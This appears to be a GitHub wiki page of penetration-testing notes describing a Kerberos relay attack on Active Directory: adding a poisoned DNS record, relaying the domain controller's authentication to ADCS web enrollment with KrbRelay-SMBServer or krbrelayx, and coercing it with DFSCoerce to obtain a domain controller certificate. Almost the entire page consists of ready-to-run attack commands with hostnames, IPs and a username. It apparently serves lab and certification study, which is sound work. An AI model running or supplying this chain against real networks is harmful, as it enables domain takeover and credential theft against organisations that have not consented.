DNS poison and KrbRelay‐SMBServer - oscpname/RELAY_scenarios GitHub Wiki
Manual: https://github.com/decoder-it/KrbRelay-SMBServer
Tools:
- https://github.com/decoder-it/KrbRelay-SMBServer
- https://github.com/Kevin-Robertson/Powermad
- https://github.com/decoder-it/DFSCoerce-exe-2
WINDOWS: This krbrelay version acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP
#Create a DNS entry for the target server_name you want to relay the kerberos AP-REQ as: <server_name>1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA and #mapped to your listener/relay IP. Domain users can typically perform secure DNS updates, for example you can use powershell script invoke-dnsupdate
#on Windows attacker box:
invoke-DNSUpdate -DNSName adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -DNSData 192.168.1.88
# Relay the DC SMB authentication to HTTP (ADCS) web enrollment and request client certificate using a linux box redirecting to windows attacker machine on port 9999:
krbRelay.exe -spn http/adcs-mylab.mylab.local -redirecthost adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -endpoint certsrv -adcs DomainController -listenerport 9999
#Trigger coerce from DC in another window:
DFSCoerce.exe -l adcs-mylab1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -t DC-2LINUX:
bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p '<REDACTED>' -k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.8.4.147
krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' --adcs --template DomainController -v 'DC-JPQ225$'
KRB5CCNAME=rosie.powell.ccache python3 dfscoerce.py -k -no-pass 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' dc-jpq225.cicada.vl